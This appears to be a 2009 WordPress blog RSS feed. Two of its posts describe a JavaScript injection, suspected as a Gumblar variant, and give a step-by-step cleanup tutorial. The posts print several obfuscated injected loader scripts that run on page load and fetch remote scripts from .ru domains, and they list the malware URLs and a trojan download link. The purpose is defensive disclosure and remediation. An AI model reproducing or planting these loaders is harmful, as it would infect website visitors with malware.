<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ryan Isra, Cyberworld, Technology &#187; website</title>
	<atom:link href="http://www.ryan-isra.net/tag/website/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ryan-isra.net</link>
	<description></description>
	<lastBuildDate>Tue, 17 Aug 2010 07:15:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>The Latest Google Page Rank Update in 2009</title>
		<link>http://www.ryan-isra.net/latest-google-page-rank-update-2009/</link>
		<comments>http://www.ryan-isra.net/latest-google-page-rank-update-2009/#comments</comments>
		<pubDate>Sat, 02 Jan 2010 12:43:44 +0000</pubDate>
		<dc:creator>Ryan Isra</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[gift]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[PageRank]]></category>
		<category><![CDATA[website]]></category>

		<guid isPermaLink="false">http://www.ryan-isra.net/?p=418</guid>
		<description><![CDATA[Hoorrrayyyyy !!! Another unexpected gift from Google. 1. I received my first cash from Google Adsense 2. My blogs PageRank were updated. ryan-isra.net updated from 0 to 3. iPhone Users updated from 0 to 2. So surprised and happy with those unexpected gifts, because I didn't care about blogging recently I was checking DigitalPoint&#8217;s forum [...]

<h3>Related Posts</h3>
<ol>
		<li><a href="http://www.ryan-isra.net/layout-design-of-facebook-group-has-changed/" rel="bookmark">Layout Design of Facebook Group has changed.</a><!-- (7.162)--></li>
		<li><a href="http://www.ryan-isra.net/1st-payment-from-google-adsense/" rel="bookmark">My first payment from Google Adsense</a><!-- (6.97211)--></li>
		<li><a href="http://www.ryan-isra.net/how-to-change-the-websites-primary-language-in-adsense-account/" rel="bookmark">How to change the website&#8217;s primary language in Adsense account</a><!-- (6.37251)--></li>
	</ol>
]]></description>
			<content:encoded><![CDATA[<p>Hoorrrayyyyy !!!<br />
Another unexpected gift from Google.<br />
1. <a href="http://www.ryan-isra.net/1st-payment-from-google-adsense/">I received my first cash from Google Adsense</a><br />
2. My blogs PageRank were updated. <a href="http://www.ryan-isra.net">ryan-isra.net</a> updated from 0 to 3. <a href="http://iphoners.org/">iPhone Users</a> updated from 0 to 2.<br />
<img src="http://www.ryan-isra.net/wp-content/plugins/yahoo-messenger-emoticons/emoticons/big_hug.gif" style="border:none;background:none;vertical-align:-25%;" alt="big hug" /><br />
So surprised and happy with those unexpected gifts, because I didn't care about blogging recently <img src="http://www.ryan-isra.net/wp-content/plugins/yahoo-messenger-emoticons/emoticons/sad.gif" style="border:none;background:none;vertical-align:-25%;" alt="sad" /><br />
I was checking <a href="http://forums.digitalpoint.com" target="_blank">DigitalPoint&#8217;s forum</a> just now, and there are so many threads talking about this update.<br />
This is a good start for long-term business, but I&#8217;m currently stuck in another short-term and profitable &#8216;black stuff&#8217; <img src="http://www.ryan-isra.net/wp-content/plugins/yahoo-messenger-emoticons/emoticons/crying.gif" style="border:none;background:none;vertical-align:-25%;" alt="crying" /></p>
<p>Google were doing major PR update in December 31<sup>st</sup> 2009. Good news for webmasters who find out that their PR was increasing, and vice versa.</p>


<h3>Related Posts</h3>
<ol>
		<li><a href="http://www.ryan-isra.net/layout-design-of-facebook-group-has-changed/" rel="bookmark">Layout Design of Facebook Group has changed.</a><!-- (7.162)--></li>
		<li><a href="http://www.ryan-isra.net/1st-payment-from-google-adsense/" rel="bookmark">My first payment from Google Adsense</a><!-- (6.97211)--></li>
		<li><a href="http://www.ryan-isra.net/how-to-change-the-websites-primary-language-in-adsense-account/" rel="bookmark">How to change the website&#8217;s primary language in Adsense account</a><!-- (6.37251)--></li>
	</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.ryan-isra.net/latest-google-page-rank-update-2009/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)</title>
		<link>http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/</link>
		<comments>http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/#comments</comments>
		<pubDate>Wed, 09 Dec 2009 16:21:26 +0000</pubDate>
		<dc:creator>Ryan Isra</dc:creator>
				<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malicious]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[website]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[www.ryan-isra.net]]></category>

		<guid isPermaLink="false">http://www.ryan-isra.net/?p=388</guid>
		<description><![CDATA[As yesterday, I found unknown code at the bottom of each wordpress file (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action. So far, I&#8217;ve found this javascript malicious code [...]

<h3>Related Posts</h3>
<ol>
		<li><a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" rel="bookmark">Malicious Javascript Code infected my blogs</a><!-- (35.9414)--></li>
		<li><a href="http://www.ryan-isra.net/what-is-sitemap-what-is-benefits-of-sitemap/" rel="bookmark">What is Sitemap? What is Benefits of Sitemap?</a><!-- (10.0593)--></li>
		<li><a href="http://www.ryan-isra.net/howto-move-wordpress-to-new-server-hosting/" rel="bookmark">How-to move wordpress to new server|hosting</a><!-- (6.79624)--></li>
	</ol>
]]></description>
			<content:encoded><![CDATA[<p>As yesterday, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/">I found unknown code at the bottom of each wordpress file</a> (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action.</p>
<p>So far, I&#8217;ve found this javascript malicious code with different var value. <strong>Nhbk5v835x5dq6</strong>, <strong>H3qqea3ur6p</strong>, and <strong>Jqjzlgspz98uxl</strong>.</p>
<p>This code will load another malicious script from <strong>http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/</strong></p>
<p><textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&#038;^/!x#^&#038;t@#&#038;u@b($!)e#(-)c^@$&#038;o#(#m^!$^.&#038;$)b$($l$o!(#&#038;)g(&#038;g)(^$e!$r#@(.@^&#038; (c(o^#m@)!#.)#p!(@o&#038;r@)n(^$o$!^r&#038;!a$)&#038;m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$ !(s@$@i^@c@&#038;.!@)r@u(!:(^8&#038;@!)!0@)8)@#0&#038;(!/$&#038;)h^d$@$f$(^c^)b@$&#038;a)^n^(k^#.&#038;@^&#038;c#(!#$o^m!)#/!h^@#d(&#038;f)&#038;c^()b#(a^$!n&#038;^(#$k^#.!$c)o))m)&#038;&#038;/($&#038;!g$$o!)o^()g))@(l$^@)e#^&#038;.&#038;&#038;c^(o()m@!)(/(&#038;f)#a!!@n!$@p))o)((p!^#.@c^!@o&#038;@m)@&#038;/@!!i&#038;n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&#038;/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl) ;}} catch(e) {}</script></textarea></p>
<p>This code will load another malicious script from <strong>http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/</strong></p>
<p><textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&#038;(t&#038;()p$$:!#@/!(/$#l!)i!&#038;v()@e!^(.$(!c!)o)m.&#038;!#g#@o((o^g)(l^$!$)@.&#038;)$eco$#(m#^@.)#@#!#a&#038;b$i#!$#$d^m^h#)$!(-!((!$s)n$&#038;(.@)c^@$o((m!(&#038;.^)(b&#038;!)e@s(@&#038;t@a()r#$#)t))s@#!#)a!l#e#r$(.))&#038;!you!&#038;):)8($0)@$8^#^@0&#038;)$^/!!&#038;w@$(O@^r(^(!d^p^@#)r#e@s^(s&#038;&#038;@@.(^^o^c#@!$)/)&#038;^m$g@(@^o(^o@g@&#$l&#038;&#038;e^))&#038;@-($(m)#)#a)i^l^#.!&#038;^)i!$@^/((!(t&#038;l)!i^v&#038;(&#038;(e()#j^a$&#038;@s(&#038;m$^&#038;(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&#038;!)t#!((#.$$c!&#038;^)&#038;/)!m@o@c#&#038;($n)e()&#038;&#038;t)#-^#!c^(n^^n@c&#).)!&#038;!o$m#($/^a$&#038;!@@b&#038;()^o($(u!&#)t^#-#))$e@@)b##a#y&#038;&#038;@.&#(^c&#038;o^^^^m@/(@^^'.replace(/\^|&#038;|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script></textarea></p>
<p>This code will load another malicious script from <strong>http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/</strong></p>
<p><textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&#038;!/(/&##g)@o^)!o)!&#038;g)^!l$(e^-&#038;&#038;!c$@@n).)#!#m$(#s#!))$n)!.&#038;^c)(!!a&#038;.$&#038;(!s^@#h)@&#038;o@(p$!^&#038;)l$&#038;o&#038;^!c!&#038;)@a&#038;l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&#038;&#038;@i$c(@s!@^t)o(r^#e!@@&#038;.)!)r!^u(#:(!8(^0$#$8)0&#038;@@/@i#@n)!t@e^#r(^i$)$^a)#.^&#038;p&#038;(!&#038;l))#^$/@(!i$)^n#(&#038;t^#&#038;e&#038;$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&#038;$$l(^e@.&#038;&#038;$!c(^o)m^(/)@@e&#038;^@m#&#038;^@p($f&#038;l^^@!i(x!))).&#038;^!c@o$()$m&#038;/##!&#038;d#e)@b$)&#038;o(##$n^#$a)^i$r(&#038;b@#l!^o^g@@.)#c@$@o!m(&#038;^)/!'.replace(/@|\!|\$|&#038;|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script></textarea></p>
<p><span id="more-388"></span><br />
Some of WordPress, Joomla, and Pligg users have reported this problem in several forums. I&#8217;ve successfully cleaned this virus from <a href="http://iphoners.org/">my iPhone blog</a> and <a href="http://www.ryan-isra.net/">ryan-isra.net</a> as well. This tutorial will guide you how to disinfect your WordPress blog from this virus.<br />
It&#8217;s very recommended to have Notepad++ application installed in your Windows to make this process easier.<br />
<a href="http://sourceforge.net/projects/notepad-plus/files/">You can download Notepad++ from this link</a>.</p>
<p>1. Login to cPanel (if applicable)<br />
2. Edit the content of index.php in root directory to be any text (i.e. <em>Under Maintenance</em>) to protect your visitors of being infected.<br />
3. Create a zip file of wp-content directory, download it to local computer and extract it.<br />
4. Use search feature and find all javascript files in wp-content folder.<br />
<img src="http://www.ryan-isra.net/images/search_all.js.png" alt="Search *.js files"></p>
<p>5. Open <strong>Notepad++</strong>, then select all files in <strong>Search Results</strong> screen. Drag all files into Notepad++&#8217;s window.<br />
<img src="http://www.ryan-isra.net/images/drag_all-files.thumb.png" alt="Drag All Files"></p>
<p>6. Press <strong>CTRL+H</strong> key, paste the javascript malicious code in &#8220;<strong>Find what</strong>&#8221; field and leave empty the &#8220;<strong>Replace with</strong>&#8221; field.<br />
<img src="http://www.ryan-isra.net/images/replace_all-in-all.png" alt="Replace all in all opened documents"></p>
<p>7. When finished, click <strong>File &#8211; Save All</strong> or simply press <strong>CTRL+SHIFT+S</strong> key.<br />
8. Repeat the step#4 and change *.js to *index*<br />
9. Repeat the step#8 and change *index* to *default*<br />
10. Remember the path of each file and then re-upload each file to its own path.<br />
11. Get a fresh copy of wordpress, copy <strong>wp-admin</strong> and <strong>wp-includes</strong> directories, compress, and upload to your hosting.<br />
12. Replace <strong>wp-admin</strong> and <strong>wp-includes</strong> directories in your hosting with the one that you just uploaded.<br />
13. Now, ensure that your computer is clean of virus/keylogger/trojan and then change your cPanel/FTP password.</p>
<p>The process could be simpler if you have never changed/customized any of your wordpress theme/plugins. You could simply re-upload a fresh wordpress installation, themes, plugins.</p>
<p>I am so sleepy, sorry if something is wrong or missing.</p>
<p>- Update -<br />
Please see these comments, some of them may help you better than my post.<br />
Thanks guys.</p>


<h3>Related Posts</h3>
<ol>
		<li><a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" rel="bookmark">Malicious Javascript Code infected my blogs</a><!-- (35.9414)--></li>
		<li><a href="http://www.ryan-isra.net/what-is-sitemap-what-is-benefits-of-sitemap/" rel="bookmark">What is Sitemap? What is Benefits of Sitemap?</a><!-- (10.0593)--></li>
		<li><a href="http://www.ryan-isra.net/howto-move-wordpress-to-new-server-hosting/" rel="bookmark">How-to move wordpress to new server|hosting</a><!-- (6.79624)--></li>
	</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>Malicious Javascript Code infected my blogs</title>
		<link>http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/</link>
		<comments>http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 14:46:32 +0000</pubDate>
		<dc:creator>Ryan Isra</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Script]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malicious]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[website]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[www.ryan-isra.net]]></category>

		<guid isPermaLink="false">http://www.ryan-isra.net/?p=368</guid>
		<description><![CDATA[It happened since yesterday. When I was checking my blogs, I got this error message in every page. Parse error: syntax error, unexpected &#8216;&#60;&#8217; in /home/$myhomedir$/public_html/wp-includes/default-widgets.php on line 1034 I immediately open default-widgets.php in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I&#8217;m very susprised when I found [...]

<h3>Related Posts</h3>
<ol>
		<li><a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" rel="bookmark">How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)</a><!-- (32.002)--></li>
		<li><a href="http://www.ryan-isra.net/moving-www-ryan-isra-net-new-webhosting/" rel="bookmark">Moving www.ryan-isra.net to a new Webhosting</a><!-- (6.57558)--></li>
		<li><a href="http://www.ryan-isra.net/sms-verification-needed-for-gmail-registration/" rel="bookmark">SMS Verification needed for Gmail Registration</a><!-- (6.16543)--></li>
	</ol>
]]></description>
			<content:encoded><![CDATA[<p>It happened since yesterday. When I was checking my blogs, I got this error message in every page.</p>
<blockquote><p><strong>Parse error</strong>: syntax error, unexpected &#8216;&lt;&#8217; in <strong>/home/$myhomedir$/public_html/wp-includes/default-widgets.php</strong> on line <strong>1034</strong></p></blockquote>
<p>I immediately open <strong>default-widgets.php</strong> in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I&#8217;m very susprised when I found these codes were exist in default-widgets.php.</p>
<p><textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&#038;!/(/&##g)@o^)!o)!&#038;g)^!l$(e^-&#038;&#038;!c$@@n).)#!#m$(#s#!))$n)!.&#038;^c)(!!a&#038;.$&#038;(!s^@#h)@&#038;o@(p$!^&#038;)l$&#038;o&#038;^!c!&#038;)@a&#038;l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&#038;&#038;@i$c(@s!@^t)o(r^#e!@@&#038;.)!)r!^u(#:(!8(^0$#$8)0&#038;@@/@i#@n)!t@e^#r(^i$)$^a)#.^&#038;p&#038;(!&#038;l))#^$/@(!i$)^n#(&#038;t^#&#038;e&#038;$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&#038;$$l(^e@.&#038;&#038;$!c(^o)m^(/)@@e&#038;^@m#&#038;^@p($f&#038;l^^@!i(x!))).&#038;^!c@o$()$m&#038;/##!&#038;d#e)@b$)&#038;o(##$n^#$a)^i$r(&#038;b@#l!^o^g@@.)#c@$@o!m(&#038;^)/!'.replace(/@|\!|\$|&#038;|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script></textarea><br />
<span id="more-368"></span><br />
I also found similar malicious code from Google.</p>
<p><textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&#038;(t&#038;()p$$:!#@/!(/$#l!)i!&#038;v()@e!^(.$(!c!)o)m.&#038;!#g#@o((o^g)(l^$!$)@.&#038;)$eco$#(m#^@.)#@#!#a&#038;b$i#!$#$d^m^h#)$!(-!((!$s)n$&#038;(.@)c^@$o((m!(&#038;.^)(b&#038;!)e@s(@&#038;t@a()r#$#)t))s@#!#)a!l#e#r$(.))&#038;!you!&#038;):)8($0)@$8^#^@0&#038;)$^/!!&#038;w@$(O@^r(^(!d^p^@#)r#e@s^(s&#038;&#038;@@.(^^o^c#@!$)/)&#038;^m$g@(@^o(^o@g@&#$l&#038;&#038;e^))&#038;@-($(m)#)#a)i^l^#.!&#038;^)i!$@^/((!(t&#038;l)!i^v&#038;(&#038;(e()#j^a$&#038;@s(&#038;m$^&#038;(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&#038;!)t#!((#.$$c!&#038;^)&#038;/)!m@o@c#&#038;($n)e()&#038;&#038;t)#-^#!c^(n^^n@c&#).)!&#038;!o$m#($/^a$&#038;!@@b&#038;()^o($(u!&#)t^#-#))$e@@)b##a#y&#038;&#038;@.&#(^c&#038;o^^^^m@/(@^^'.replace(/\^|&#038;|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script></textarea></p>
<p>The 1st code above will load another malicious script from <strong>http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/</strong>, while the 2nd code above will load another malicious script from <strong>http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/</strong></p>
<p>I could accessing <a href="http://iphoners.org/">my iPhone blog</a>, though another error appeared:<br />
<strong>Can not modify header information &#8211; headers already sent by (output started at &#8230;</strong><br />
At the same time, InternetDownloadManager asked me to download <strong>ChangeLog.pdf</strong> from <strong>http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/pics/ChangeLog.pdf</strong> and <a href="http://www.malwarebytes.org/">MBAM (Malwarebytes&#8217; Anti-Malware)</a> detected <strong>C:\Documents and Settings\username\Local Settings\Temp\0.5147965079164781.exe</strong> (random file name) as <strong>Trojan.Dropper</strong>. Kaspersky Anti-Virus 2009 couldn&#8217;t detect it, but Kaspersky Anti-Virus 2010 detected it as <strong>unknow threat UDS: DangerousObject.Multi.Generic</strong> with <strong>High</strong> criticality.</p>
<p>I understand that I was being infected by a virus, though I had no idea what kind of virus was that. Searched via Google by using <strong>&lt;script&gt;/*GNU GPL*/ try{window.onload</strong> as a keyword, didn&#8217;t help much, while using <strong>setAttribute(&#8216;id&#8217;, `myscript1`)</strong> just displaying list of websites, which has been infected. Last but not least, I used <strong>setAttribute(&#8216;id&#8217;, `myscript1`) virus</strong> as keyword, then it refer me to <a href="http://www.webhostingtalk.nl/beveiliging/155939-gumblar-virus.html">WebHostingTalk.nl</a>. I got a little enlightenment about what I was dealing with.</p>
<p>So, its name is Gumblar. You can find further information about Gumblar on <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">Unmask Parasites Blog</a>, <a href="http://en.wikipedia.org/wiki/Gumblar">Wikipedia</a>, or <a href="http://www.iss.net/threats/gumblar.html">ISS.net</a>. I got alot of useful information.<br />
However, I might be infected by its variant, because it wasn&#8217;t inject iframe, no base64 code, no images.php file, and even different code.</p>
<p>The one I got spreading itself by infected all javascript files (<strong>*.js</strong>) and index files (<strong>*index*</strong>, <strong>*default*</strong>). <a href="http://www.ryan-isra.net">www.ryan-isra.net</a>, which is hosted on same hosting also infected. So far, I suspected that either my Windows XP has infected a keylogger or someone is sniffing my network traffic <img src="http://www.ryan-isra.net/wp-content/plugins/yahoo-messenger-emoticons/emoticons/big_grin.gif" style="border:none;background:none;vertical-align:-25%;" alt="big grin" /></p>
<p>Now, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/">my wordpress blog has been disinfected</a>.</p>


<h3>Related Posts</h3>
<ol>
		<li><a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" rel="bookmark">How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)</a><!-- (32.002)--></li>
		<li><a href="http://www.ryan-isra.net/moving-www-ryan-isra-net-new-webhosting/" rel="bookmark">Moving www.ryan-isra.net to a new Webhosting</a><!-- (6.57558)--></li>
		<li><a href="http://www.ryan-isra.net/sms-verification-needed-for-gmail-registration/" rel="bookmark">SMS Verification needed for Gmail Registration</a><!-- (6.16543)--></li>
	</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>
